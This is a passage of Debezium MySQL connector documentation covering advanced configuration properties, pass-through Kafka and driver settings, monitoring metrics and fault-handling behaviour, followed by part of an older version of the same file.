\n\n|[[mysql-property-message-key-columns]]<<mysql-property-message-key-columns, `message.key.columns`>>\n|_empty string_\n|A semicolon separated list of tables with regular expressions that match table column names. The connector maps values in matching columns to key fields in change event records that it sends to Kafka topics. 
This is useful when a table does not have a primary key, or when you want to order change event records in a Kafka topic according to a field that is not a primary key. +\n +\nSeparate entries with semicolons. Insert a colon between the fully-qualified table name and its regular expression. The format (shown with spaces for clarity only) is: +\n +\n_database-name_ `.` _table-name_ `:` _regexp_ `;` ... +\n +\nFor example: +\n +\n`dbA.table_a:regex_1;dbB.table_b:regex_2;dbC.table_c:regex_3` +\n +\nIf `table_a` has an `id` column, and `regex_1` is `^i` (matches any column that starts with `i`), the connector maps the value in the `id` column of `table_a` to a key field in change events that the connector sends to Kafka. \n\n|[[mysql-property-binary-handling-mode]]<<mysql-property-binary-handling-mode,`binary.handling.mode`>>\n|bytes\n|Specifies how binary columns, for example, `blob`, `binary`, `varbinary`, should be represented in change events. Possible settings: +\n +\n`bytes` represents binary data as a byte array. +\n +\n`base64` represents binary data as a base64-encoded String. +\n +\n`hex` represents binary data as a hex-encoded (base16) String.\n\n|===\n\n[id=\"mysql-advanced-connector-configuration-properties\"]\n.Advanced MySQL connector configuration properties\n\nThe following table describes {link-prefix}:{link-mysql-connector}#mysql-advanced-connector-configuration-properties[advanced MySQL connector properties]. The default values for these properties rarely need to be changed. Therefore, you do not need to specify them in the connector configuration.\n\n.Descriptions of MySQL connector advanced configuration properties\n[cols=\"30%a,20%a,50%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|Property |Default |Description\n\n|[[mysql-property-connect-keep-alive]]<<mysql-property-connect-keep-alive, `connect.keep.alive`>>\n|`true`\n|A Boolean value that specifies whether a separate thread should be used to ensure that the connection to the MySQL server\/cluster is kept alive.\n\n|[[mysql-property-table-ignore-builtin]]<<mysql-property-table-ignore-builtin, `table.ignore{zwsp}.builtin`>>\n|`true`\n|A Boolean value that specifies whether built-in system tables should be ignored. This applies regardless of the table include and exclude lists. By default, system tables are excluded from having their changes captured, and no events are generated when changes are made to any system tables.\n\n|[[mysql-property-database-history-kafka-recovery-poll-interval-ms]]<<mysql-property-database-history-kafka-recovery-poll-interval-ms, `database.history{zwsp}.kafka.recovery{zwsp}.poll.interval.ms`>>\n|`100`\n|An integer value that specifies the maximum number of milliseconds the connector should wait during startup\/recovery while polling for persisted data. The default is 100ms.\n\n|[[mysql-property-database-history-kafka-recovery-attempts]]<<mysql-property-database-history-kafka-recovery-attempts, `database.history{zwsp}.kafka.recovery{zwsp}.attempts`>>\n|`4`\n|The maximum number of times that the connector should try to read persisted history data before the connector recovery fails with an error. 
The maximum amount of time to wait after receiving no data is `recovery.attempts` x `recovery.poll.interval.ms`.\n\n|[[mysql-property-database-history-skip-unparseable-ddl]]<<mysql-property-database-history-skip-unparseable-ddl, `database.history{zwsp}.skip.unparseable{zwsp}.ddl`>>\n|`false`\n|A Boolean value that specifies whether the connector should ignore malformed or unknown database statements or stop processing so a human can fix the issue.\nThe safe default is `false`.\nSkipping should be used only with care as it can lead to data loss or mangling when the binlog is being processed.\n\n|[[mysql-property-database-history-store-only-monitored-tables-ddl]]<<mysql-property-database-history-store-only-monitored-tables-ddl, `database.history{zwsp}.store.only{zwsp}.monitored.tables{zwsp}.ddl`>>\n|`false`\n|A Boolean value that specifies whether the connector should record all DDL statements +\n +\n`true` records only those DDL statements that are relevant to tables whose changes are being captured by {prodname}. Set to `true` with care because missing data might become necessary if you change which tables have their changes captured. +\n +\nThe safe default is `false`.\n\n|[[mysql-property-database-ssl-mode]]<<mysql-property-database-ssl-mode, `database.ssl.mode`>>\n|`disabled`\n|Specifies whether to use an encrypted connection. Possible settings are: +\n +\n`disabled` specifies the use of an unencrypted connection. +\n +\n`preferred` establishes an encrypted connection if the server supports secure connections. If the server does not support secure connections, falls back to an unencrypted connection. +\n +\n`required` establishes an encrypted connection or fails if one cannot be made for any reason. +\n +\n`verify_ca` behaves like `required` but additionally it verifies the server TLS certificate against the configured Certificate Authority (CA) certificates and fails if the server TLS certificate does not match any valid CA certificates. +\n +\n`verify_identity` behaves like `verify_ca` but additionally verifies that the server certificate matches the host of the remote connection.\n\n|[[mysql-property-binlog-buffer-size]]<<mysql-property-binlog-buffer-size, `binlog.buffer.size`>>\n|0\n|The size of a look-ahead buffer used by the binlog reader. The default setting of `0` disables buffering. +\n +\nUnder specific conditions, it is possible that the MySQL binlog contains uncommitted data finished by a `ROLLBACK` statement.\nTypical examples are using savepoints or mixing temporary and regular table changes in a single transaction. +\n +\nWhen a beginning of a transaction is detected then {prodname} tries to roll forward the binlog position and find either `COMMIT` or `ROLLBACK` so it can determine whether to stream the changes from the transaction.\nThe size of the binlog buffer defines the maximum number of changes in the transaction that {prodname} can buffer while searching for transaction boundaries.\nIf the size of the transaction is larger than the buffer then {prodname} must rewind and re-read the events that have not fit into the buffer while streaming. +\n +\nNOTE: This feature is incubating. Feedback is encouraged. It is expected that this feature is not completely polished.\n\n|[[mysql-property-snapshot-mode]]<<mysql-property-snapshot-mode, `snapshot.mode`>>\n|`initial`\n|Specifies the criteria for running a snapshot when the connector starts. 
Possible settings are: +\n +\n`initial` - the connector runs a snapshot only when no offsets have been recorded for the logical server name. +\n +\n`when_needed` - the connector runs a snapshot upon startup whenever it deems it necessary. That is, when no offsets are available, or when a previously recorded offset specifies a binlog location or GTID that is not available in the server. +\n +\n`never` - the connector never uses snapshots. Upon first startup with a logical server name, the connector reads from the beginning of the binlog. Configure this behavior with care. It is valid only when the binlog is guaranteed to contain the entire history of the database. +\n +\n`schema_only` - the connector runs a snapshot of the schemas and not the data. This setting is useful when you do not need the topics to contain a consistent snapshot of the data but need them to have only the changes since the connector was started. +\n +\n`schema_only_recovery` - this is a recovery setting for a connector that has already been capturing changes. When you restart the connector, this setting enables recovery of a corrupted or lost database history topic. You might set it periodically to \"clean up\" a database history topic that has been growing unexpectedly. Database history topics require infinite retention.\n\n|[[mysql-property-snapshot-locking-mode]]<<mysql-property-snapshot-locking-mode, `snapshot.locking{zwsp}.mode`>>\n|`minimal`\na|Controls whether and how long the connector holds the global MySQL read lock, which prevents any updates to the database, while the connector is performing a snapshot. Possible settings are: +\n +\n`minimal` - the connector holds the global read lock for only the initial portion of the snapshot during which the connector reads the database schemas and other metadata. The remaining work in a snapshot involves selecting all rows from each table. The connector can do this in a consistent fashion by using a REPEATABLE READ transaction. This is the case even when the global read lock is no longer held and other MySQL clients are updating the database. +\n +\n`minimal_percona` - the connector holds link:https:\/\/www.percona.com\/doc\/percona-server\/5.7\/management\/backup_locks.html[the global backup lock] for only the initial portion of the snapshot during which the connector reads the database schemas and other metadata. The remaining work in a snapshot involves selecting all rows from each table. The connector can do this in a consistent fashion by using a REPEATABLE READ transaction. This is the case even when the global backup lock is no longer held and other MySQL clients are updating the database. This mode does not flush tables to disk, is not blocked by long-running reads, and is available only in Percona Server. +\n +\n`extended` - blocks all writes for the duration of the snapshot. Use this setting if there are clients that are submitting operations that MySQL excludes from REPEATABLE READ semantics. +\n +\n`none` - prevents the connector from acquiring any table locks during the snapshot. While this setting is allowed with all snapshot modes, it is safe to use if and _only_ if no schema changes are happening while the snapshot is running. For tables defined with MyISAM engine, the tables would still be locked despite this property being set as MyISAM acquires a table lock. 
This behavior is unlike InnoDB engine, which acquires row level locks.\n\n|[[mysql-property-snapshot-select-statement-overrides]]<<mysql-property-snapshot-select-statement-overrides, `snapshot.select{zwsp}.statement{zwsp}.overrides`>>\n|\n|Controls which table rows are included in snapshots. This property affects snapshots only. It does not affect events captured from the binlog. Specify a comma-separated list of fully-qualified table names in the form _databaseName{zwsp}.tableName_. +\n +\nFor each table that you specify, also specify another configuration property: `snapshot{zwsp}.select{zwsp}.statement{zwsp}.overrides{zwsp}._DB_NAME_._TABLE_NAME_`. For example, the name of the other configuration property might be: `snapshot{zwsp}.select{zwsp}.statement{zwsp}.overrides{zwsp}.customers{zwsp}.orders`. Set this property to a `SELECT` statement that obtains only the rows that you want in the snapshot. When the connector performs a snapshot, it executes this `SELECT` statement to retrieve data from that table. +\n +\nA possible use case for setting these properties is large, append-only tables. You can specify a `SELECT` statement that sets a specific point for where to start a snapshot, or where to resume a snapshot if a previous snapshot was interrupted.\n\n|[[mysql-property-min-row-count-to-stream-results]]<<mysql-property-min-row-count-to-stream-results, `min.row.count.to{zwsp}.stream.results`>>\n|`1000`\n|During a snapshot, the connector queries each table for which the connector is configured to capture changes. The connector uses each query result to produce a read event that contains data for all rows in that table. This property determines whether the MySQL connector puts results for a table into memory, which is fast but requires large amounts of memory, or streams the results, which can be slower but work for very large tables. The setting of this property specifies the minimum number of rows a table must contain before the connector streams results. +\n +\nTo skip all table size checks and always stream all results during a snapshot, set this property to `0`.\n\n|[[mysql-property-heartbeat-interval-ms]]<<mysql-property-heartbeat-interval-ms, `heartbeat.interval{zwsp}.ms`>>\n|`0`\n|Controls how frequently the connector sends heartbeat messages to a Kafka topic. The default behavior is that the connector does not send heartbeat messages. +\n +\nHeartbeat messages are useful for monitoring whether the connector is receiving change events from the database. Heartbeat messages might help decrease the number of change events that need to be re-sent when a connector restarts. To send heartbeat messages, set this property to a positive integer, which indicates the number of milliseconds between heartbeat messages. \n\n|[[mysql-property-heartbeat-topics-prefix]]<<mysql-property-heartbeat-topics-prefix, `heartbeat.topics{zwsp}.prefix`>>\n|`__debezium-heartbeat`\n|Controls the name of the topic to which the connector sends heartbeat messages. 
The topic name has this pattern: +\n +\n_heartbeat.topics.prefix_._server.name_ +\n +\nFor example, if the database server name is `fulfillment`, the default topic name is `__debezium-heartbeat.fulfillment`.\n\n|[[mysql-property-database-initial-statements]]<<mysql-property-database-initial-statements, `database.initial{zwsp}.statements`>>\n|\n|A semicolon separated list of SQL statements to be executed when a JDBC connection, not the connection that is reading the transaction log, to the database is established.\nTo specify a semicolon as a character in a SQ statement and not as a delimiter, use two semicolons, (`;;`). +\n +\nThe connector might establish JDBC connections at its own discretion, so this property is ony for configuring session parameters. It is not for executing DML statements.\n\n|[[mysql-property-snapshot-delay-ms]]<<mysql-property-snapshot-delay-ms, `snapshot.delay.ms`>>\n|\n|An interval in milliseconds that the connector should wait before performing a snapshot when the connector starts. If you are starting multiple connectors in a cluster, this property is useful for avoiding snapshot interruptions, which might cause re-balancing of connectors. \n\n|[[mysql-property-snapshot-fetch-size]]<<mysql-property-snapshot-fetch-size, `snapshot.fetch.size`>>\n|\n|During a snapshot, the connector reads table content in batches of rows. This property specifies the maximum number of rows in a batch.\n\n|[[mysql-property-snapshot-lock-timeout-ms]]<<mysql-property-snapshot-lock-timeout-ms, `snapshot.lock{zwsp}.timeout.ms`>>\n|`10000`\n|Positive integer that specifies the maximum amount of time (in milliseconds) to wait to obtain table locks when performing a snapshot. If the connector cannot acquire table locks in this time interval, the snapshot fails. See {link-prefix}:{link-mysql-connector}#mysql-snapshots[how MySQL connectors perform database snapshots].\n\n|[[mysql-property-enable-time-adjuster]]<<mysql-property-enable-time-adjuster, `enable.time{zwsp}.adjuster`>>\n|`true`\n|Boolean value that indicates whether the connector converts a 2-digit year specification to 4 digits. Set to `false` when conversion is fully delegated to the database. +\n +\nMySQL allows users to insert year values with either 2-digits or 4-digits. For 2-digit values, the value gets mapped to a year in the range 1970 - 2069. The default behavior is that the connector does the conversion. \n\nifdef::community[]\n|[[mysql-property-source-struct-version]]<<mysql-property-source-struct-version, `source.struct{zwsp}.version`>>\n|`v2`\n|Schema version for the `source` block in {prodname} events. {prodname} 0.10 introduced a few breaking changes to the structure of the `source` block in order to unify the exposed structure across all the connectors. +\n +\nBy setting this option to `v1`, the structure used in earlier versions can be produced. However, this setting is not recommended and is planned for removal in a future {prodname} version.\nendif::community[]\n\n|[[mysql-property-sanitize-field-names]]<<mysql-property-sanitize-field-names, `sanitize.field{zwsp}.names`>>\n|`true` if connector configuration sets the `key{zwsp}.converter` or `value{zwsp}.converter` property to the Avro converter. 
+\n`false` if not.\n|Indicates whether field names are sanitized to adhere to {link-prefix}:{link-avro-serialization}#avro-naming[Avro naming requirements].\n\n|[[mysql-property-skipped-operations]]<<mysql-property-skipped-operations, `skipped.operations`>>\n|\n|Comma-separated list of oplog operations to skip during streaming. Values that you can specify are: `c` for inserts, `u` for updates, `d` for deletes. By default, no operations are skipped.\n\n|===\n\n[id=\"mysql-pass-through-configuration-properties\"]\n.Pass-through configuration properties\n\nThe MySQL connector also supports {link-prefix}:{link-mysql-connector}#mysql-pass-through-configuration-properties[pass-through configuration properties] that are used when creating the Kafka producer and consumer. Specifically, all connector configuration properties that begin with the `database.history.producer.` prefix are used (without the prefix) when creating the Kafka producer that writes to the database history. All properties that begin with the prefix `database.history.consumer.` are used (without the prefix) when creating the Kafka consumer that reads the database history upon connector start-up.\n\nFor example, the following connector configuration properties can be used to secure connections to the Kafka broker:\n\n----\ndatabase.history.producer.security.protocol=SSL\ndatabase.history.producer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.producer.ssl.keystore.password=test1234\ndatabase.history.producer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.producer.ssl.truststore.password=test1234\ndatabase.history.producer.ssl.key.password=test1234\ndatabase.history.consumer.security.protocol=SSL\ndatabase.history.consumer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.consumer.ssl.keystore.password=test1234\ndatabase.history.consumer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.consumer.ssl.truststore.password=test1234\ndatabase.history.consumer.ssl.key.password=test1234\n----\n\nSee link:{link-kafka-docs}.html[the Kafka documentation] for more details about _pass-through_ properties.\n\n[id=\"mysql-pass-through-properties-for-database-drivers\"]\n.Pass-through properties for database drivers\n\nIn addition to the pass-through properties for the Kafka producer and consumer, there are {link-prefix}:{link-mysql-connector}#mysql-pass-through-properties-for-database-drivers[pass-through properties for database drivers]. These properties have the `database.` prefix. 
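\n\nThe following sketch shows how such a driver option can sit among the connector properties; `tinyInt1isBit` is a MySQL Connector\/J option, and the value shown is illustrative only:\n\n----\n# the database. prefix is stripped; the remainder goes to the MySQL driver\ndatabase.tinyInt1isBit=false\n----\n\n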
For example, `database.tinyInt1isBit=false` is passed to the JDBC URL.\n\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-mysql-connector-performance\n\/\/ Title: Monitoring {prodname} MySQL connector performance\n[[mysql-monitoring]]\n== Monitoring\n\nThe {prodname} MySQL connector provides three types of metrics that are in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.\n\n* {link-prefix}:{link-mysql-connector}#mysql-snapshot-metrics[Snapshot metrics] provide information about connector operation while performing a snapshot.\n* {link-prefix}:{link-mysql-connector}#mysql-binlog-metrics[Binlog metrics] provide information about connector operation when the connector is reading the binlog.\n* {link-prefix}:{link-mysql-connector}#mysql-schema-history-metrics[Schema history metrics] provide information about the status of the connector's schema history.\n\n{link-prefix}:{link-debezium-monitoring}[{prodname} monitoring documentation] provides details for how to expose these metrics by using JMX.\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-during-snapshots-of-mysql-databases\n\/\/ Title: Monitoring {prodname} during snapshots of MySQL databases\n[[mysql-snapshot-metrics]]\n=== Snapshot metrics\n\nThe *MBean* is `debezium.mysql:type=connector-metrics,context=snapshot,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]\n\nThe {prodname} MySQL connector also provides the `HoldingGlobalLock` custom snapshot metric. This metric is set to a Boolean value that indicates whether the connector currently holds a global or table write lock. \n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-mysql-connector-binlog-reading\n\/\/ Title: Monitoring {prodname} MySQL connector binlog reading\n[[mysql-binlog-metrics]]\n=== Binlog metrics\n\nThe *MBean* is `debezium.mysql:type=connector-metrics,context=binlog,server=_<database.server.name>_`.\n\nTransaction-related attributes are available only if binlog event buffering is enabled. See {link-prefix}:{link-mysql-connector}#mysql-property-binlog-buffer-size[`binlog.buffer.size`] in the advanced connector configuration properties for more details.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]\n\nThe {prodname} MySQL connector also provides the following custom binlog metrics:\n\n.Descriptions of custom binlog metrics\n[cols=\"3,2,5\",options=\"header\"]\n|===\n|Attribute |Type |Description\n\n|`BinlogFilename`\n|`string`\n|The name of the binlog file that the connector has most recently read.\n\n|`BinlogPosition`\n|`long`\n|The most recent position (in bytes) within the binlog that the connector has read.\n\n|`IsGtidModeEnabled`\n|`boolean`\n|Flag that denotes whether the connector is currently tracking GTIDs from the MySQL server.\n\n|`GtidSet`\n|`string`\n|The string representation of the most recent GTID set processed by the connector when reading the binlog.\n\n|`NumberOfSkipped{zwsp}Events`\n|`long`\n|The number of events that have been skipped by the MySQL connector. Typically, events are skipped due to a malformed or unparseable event from MySQL's binlog.\n\n|`NumberOfDisconnects`\n|`long`\n|The number of disconnects by the MySQL connector.\n\n|`NumberOfRolledBack{zwsp}Transactions`\n|`long`\n|The number of processed transactions that were rolled back and not streamed.\n\n|`NumberOfNotWell{zwsp}FormedTransactions`\n|`long`\n|The number of transactions that have not conformed to the expected protocol of `BEGIN` + `COMMIT`\/`ROLLBACK`. This value should be `0` under normal conditions.\n\n|`NumberOfLarge{zwsp}Transactions`\n|`long`\n|The number of transactions that have not fit into the look-ahead buffer. For optimal performance, this value should be significantly smaller than `NumberOfCommittedTransactions` and `NumberOfRolledBackTransactions`.\n\n|===\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-mysql-connector-schema-history\n\/\/ Title: Monitoring {prodname} MySQL connector schema history\n[[mysql-schema-history-metrics]]\n=== Schema history metrics\n\nThe *MBean* is `debezium.mysql:type=connector-metrics,context=schema-history,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-schema-history-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-mysql-connectors-handle-faults-and-problems\n\/\/ Title: How {prodname} MySQL connectors handle faults and problems\n[[mysql-when-things-go-wrong]]\n== Behavior when things go wrong\n\n{prodname} is a distributed system that captures all changes in multiple upstream databases; it never misses or loses an event. When the system is operating normally or being managed carefully, {prodname} provides _exactly once_ delivery of every change event record. \n\nIf a fault does happen, the system does not lose any events. However, while it is recovering from the fault, it might repeat some change events. In these abnormal situations, {prodname}, like Kafka, provides _at least once_ delivery of change events.\n\nifdef::community[]\nThe rest of this section describes how {prodname} handles various kinds of faults and problems.\nendif::community[]\n\nifdef::product[]\nDetails are in the following sections: \n\n* xref:debezium-mysql-connector-configuration-and-startup-errors[]\n* xref:mysql-becomes-unavailable-while-debezium-is-running[]\n* xref:debezium-mysql-kafka-connect-process-stops-gracefully[]\n* xref:debezium-mysql-kafka-connect-process-crashes[]\n* xref:debezium-mysql-kafka-process-becomes-unavailable[]\n* xref:mysql-purges-binlog-files-used-by-debezium[]\n\nendif::product[]\n\n[id=\"debezium-mysql-connector-configuration-and-startup-errors\"]\n=== Configuration and startup errors\n\nIn the following situations, the connector fails when trying to start, reports an error or exception in the log, and stops running:\n\n* The connector's configuration is invalid.\n* The connector cannot successfully connect to the MySQL server by using the specified connection parameters.\n* The connector is attempting to restart at a position in the binlog for which MySQL no longer has the history available.\n\nIn these cases, the error message has details about the problem and possibly a suggested workaround. After you correct the configuration or address the MySQL problem, restart the connector.\n\n[id=\"mysql-becomes-unavailable-while-debezium-is-running\"]\n=== MySQL becomes unavailable\n\nIf your MySQL server becomes unavailable, the {prodname} MySQL connector fails with an error and the connector stops. 
When the server is available again, restart the connector.\n\nHowever, if GTIDs are enabled for a highly available MySQL cluster, you can restart the connector immediately. It will connect to a different MySQL server in the cluster, find the location in the server's binlog that represents the last transaction, and begin reading the new server's binlog from that specific location.\n\nIf GTIDs are not enabled, the connector records the binlog position of only the MySQL server to which it was connected. To restart from the correct binlog position, you must reconnect to that specific server.\n\n[id=\"debezium-mysql-kafka-connect-process-stops-gracefully\"]\n=== Kafka Connect stops gracefully\n\nWhen Kafka Connect stops gracefully, there is a short delay while the {prodname} MySQL connector tasks are stopped and restarted on new Kafka Connect processes.\n\n[id=\"debezium-mysql-kafka-connect-process-crashes\"]\n=== Kafka Connect process crashes\n\nIf Kafka Connect crashes, the process stops and any {prodname} MySQL connector tasks terminate without their most recently-processed offsets being recorded. In distributed mode, Kafka Connect restarts the connector tasks on other processes. However, the MySQL connector resumes from the last offset recorded by the earlier processes. This means that the replacement tasks might generate some of the same events processed prior to the crash, creating duplicate events.\n\nEach change event message includes source-specific information that you can use to identify duplicate events, for example: \n\n* Event origin\n* MySQL server's event time\n* The binlog file name and position\n* GTIDs (if used)\n\n[id=\"debezium-mysql-kafka-process-becomes-unavailable\"]\n=== Kafka becomes unavailable\n\nThe Kafka Connect framework records {prodname} change events in Kafka by using the Kafka producer API. If the Kafka brokers become unavailable, the {prodname} MySQL connector pauses until the connection is reestablished and the connector resumes where it left off.\n\n[id=\"mysql-purges-binlog-files-used-by-debezium\"]\n=== MySQL purges binlog files\n\nIf the {prodname} MySQL connector stops for too long, the MySQL server purges older binlog files and the connector's last position may be lost. When the connector is restarted, the MySQL server no longer has the starting point and the connector performs another initial snapshot. If the snapshot is disabled, the connector fails with an error.\n\nSee {link-prefix}:{link-mysql-connector}#mysql-snapshots[snapshots] for details about how MySQL connectors perform initial snapshots.\n","old_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n:context: debezium\n\n[id=\"debezium-connector-for-mysql\"]\n= {prodname} connector for MySQL\n\nMySQL has a binary log (binlog) that records all operations in the order in which they are committed to the database. This includes changes to table schemas as well as changes to the data in tables. MySQL uses the binlog for replication and recovery.\n\nThe {prodname} MySQL connector reads the binlog, produces change events for row-level `INSERT`, `UPDATE`, and `DELETE` operations, and emits the change events to Kafka topics. Client applications read those Kafka topics.\n\nAs MySQL is typically set up to purge binlogs after a specified period of time, the MySQL connector performs an initial _consistent snapshot_ of each of your databases. 
The MySQL connector reads the binlog from the point at which the snapshot was made.\n\nifdef::product[]\nInformation and procedures for using a {prodname} MySQL connector are organized as follows:\n\n* xref:how-debezium-mysql-connectors-work[]\n* xref:descriptions-of-debezium-mysql-connector-data-change-events[]\n* xref:how-debezium-mysql-connectors-map-data-types[]\n* xref:setting-up-mysql-to-run-a-debezium-connector[]\n* xref:deploying-debezium-mysql-connectors[]\n* xref:monitoring-debezium-mysql-connector-performance[]\n* xref:how-debezium-mysql-connectors-handle-faults-and-problems[]\n\nendif::product[]\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-mysql-connectors-work\n\/\/ Title: How {prodname} MySQL connectors work\n[[how-the-mysql-connector-works]]\n== How the connector works\n\nTo optimally configure and run a {prodname} MySQL connector, it is helpful to understand how the connector tracks the structure of tables, exposes schema changes, performs snapshots, and determines Kafka topic names. An overview of the MySQL topologies that the connector supports is useful for planning your application. \n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:how-debezium-mysql-connectors-handle-database-schema-changes[]\n* xref:how-debezium-mysql-connectors-expose-database-schema-changes[]\n* xref:how-debezium-mysql-connectors-perform-database-snapshots[]\n* xref:default-names-of-kafka-topics-that-receive-debezium-mysql-change-event-records[]\n* xref:mysql-topologies-supported-by-debezium-connectors[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-mysql-connectors-handle-database-schema-changes\n\/\/ Title: How {prodname} MySQL connectors handle database schema changes\n[[mysql-schema-history-topic]]\n=== Schema history topic\n\nWhen a database client queries a database, the client uses the database\u2019s current schema. However, the database schema can be changed at any time, which means that the connector must be able to identify what the schema was at the time each insert, update, or delete operation was recorded. Also, a connector cannot just use the current schema because the connector might be processing events that are relatively old and may have been recorded before the tables' schemas were changed. \n\nTo handle this, MySQL includes in the binlog not only the row-level changes to the data, but also the DDL statements that are applied to the database. As the connector reads the binlog and comes across these DDL statements, it parses them and updates an in-memory representation of each table\u2019s schema. The connector uses this schema representation to identify the structure of the tables at the time of each insert, update, or delete operation and to produce the appropriate change event. In a separate database history Kafka topic, the connector records all DDL statements along with the position in the binlog where each DDL statement appeared.\n\nWhen the connector restarts after having crashed or been stopped gracefully, the connector starts reading the binlog from a specific position, that is, from a specific point in time. The connector rebuilds the table structures that existed at this point in time by reading the database history Kafka topic and parsing all DDL statements up to the point in the binlog where the connector is starting.\n\nThis database history topic is for connector use only. 
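\n\nFor orientation, the following is a minimal sketch of the connector properties that name this topic and the Kafka cluster that hosts it; the values shown are illustrative placeholders:\n\n----\n# illustrative values; use your Kafka brokers and a dedicated topic name\ndatabase.history.kafka.bootstrap.servers=kafka:9092\ndatabase.history.kafka.topic=dbhistory.fulfillment\n----\n\n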
Optionally, the connector can also {link-prefix}:{link-mysql-connector}#mysql-schema-change-topic[emit schema change events to a different topic that is intended for consumer applications].\n\nWhen the MySQL connector captures changes in a table to which a schema change tool such as `gh-ost` or `pt-online-schema-change` is applied, helper tables are created during the migration process. The connector needs to be configured to capture changes to these helper tables. If consumers do not need the records that are generated for helper tables, a simple message transform can be applied to filter them out.\n\nSee {link-prefix}:{link-mysql-connector}#mysql-topic-names[default names for topics] that receive {prodname} event records.\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-mysql-connectors-expose-database-schema-changes\n\/\/ Title: How {prodname} MySQL connectors expose database schema changes\n[id=\"mysql-schema-change-topic\"]\n=== Schema change topic\n\nYou can configure a {prodname} MySQL connector to produce schema change events that include all DDL statements applied to databases in the MySQL server. The connector emits these events to a Kafka topic named _serverName_ where _serverName_ is the name of the connector as specified by the `database.server.name` connector configuration property.\n\nIf you choose to use _schema change events_, ensure that you consume records from the schema change topic. The database history topic is for connector use only. \n\nIMPORTANT: A global order for events emitted to the schema change topic is vital. Therefore, you must not partition the schema change topic. This means that you must specify a partition count of `1` when creating this topic. When relying on auto topic creation, make sure that Kafka\u2019s `num.partitions` configuration option, which specifies the default number of partitions, is set to `1`.\n\nEach record that the connector emits to the schema change topic contains a message key that includes the name of the database to which the DDL statement was applied, for example: \n\n[source,json,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.SchemaChangeKey\",\n \"optional\": false,\n \"fields\": [\n {\n \"field\": \"databaseName\",\n \"type\": \"string\",\n \"optional\": false\n }\n ]\n },\n \"payload\": {\n \"databaseName\": \"inventory\"\n }\n}\n----\n\nThe schema change event record value contains a structure that includes the DDL statements, the name of the database to which the statements were applied, and the position in the binlog where the statements appeared, for example: \n\n[source,json,subs=\"attributes\"]\n----\n{\n \"schema\": {\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.SchemaChangeValue\",\n \"optional\": false,\n \"fields\": [\n {\n \"field\": \"databaseName\",\n \"type\": \"string\",\n \"optional\": false\n },\n {\n \"field\": \"ddl\",\n \"type\": \"string\",\n \"optional\": false\n },\n {\n \"field\": \"source\",\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.Source\",\n \"optional\": false,\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"server_id\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_sec\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"gtid\"\n 
},\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"file\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"pos\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"row\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"thread\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"table\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"query\"\n }\n ]\n }\n ]\n },\n \"payload\": {\n \"databaseName\": \"inventory\",\n \"ddl\": \"CREATE TABLE products ( id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY, name VARCHAR(255) NOT NULL, description VARCHAR(512), weight FLOAT ); ALTER TABLE products AUTO_INCREMENT = 101;\",\n \"source\" : {\n \"version\": \"{debezium-version}\",\n \"name\": \"mysql-server-1\",\n \"server_id\": 0,\n \"ts_sec\": 0,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 154,\n \"row\": 0,\n \"snapshot\": true,\n \"thread\": null,\n \"db\": null,\n \"table\": null,\n \"query\": null\n }\n }\n}\n----\n\nThe `ddl` field might contain multiple DDL statements. Each statement applies to the database in the `databaseName` field. The statements appear in the order in which they were applied to the database. The `source` field is structured exactly as a standard data change event written to table-specific topics. This field is useful to correlate events on different topics.\n\n[source,json,subs=\"+attributes\"]\n----\n....\n\"payload\": {\n \"databaseName\": \"inventory\",\n \"ddl\": \"CREATE TABLE products ( id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,...)\",\n \"source\" : {\n ...\n }\n}\n....\n----\n\nA client can submit multiple DDL statements to be applied to multiple databases. If MySQL applies them atomically, the connector takes the DDL statements in order, groups them by database, and creates a schema change event for each group. If MySQL applies them individually, the connector creates a separate schema change event for each 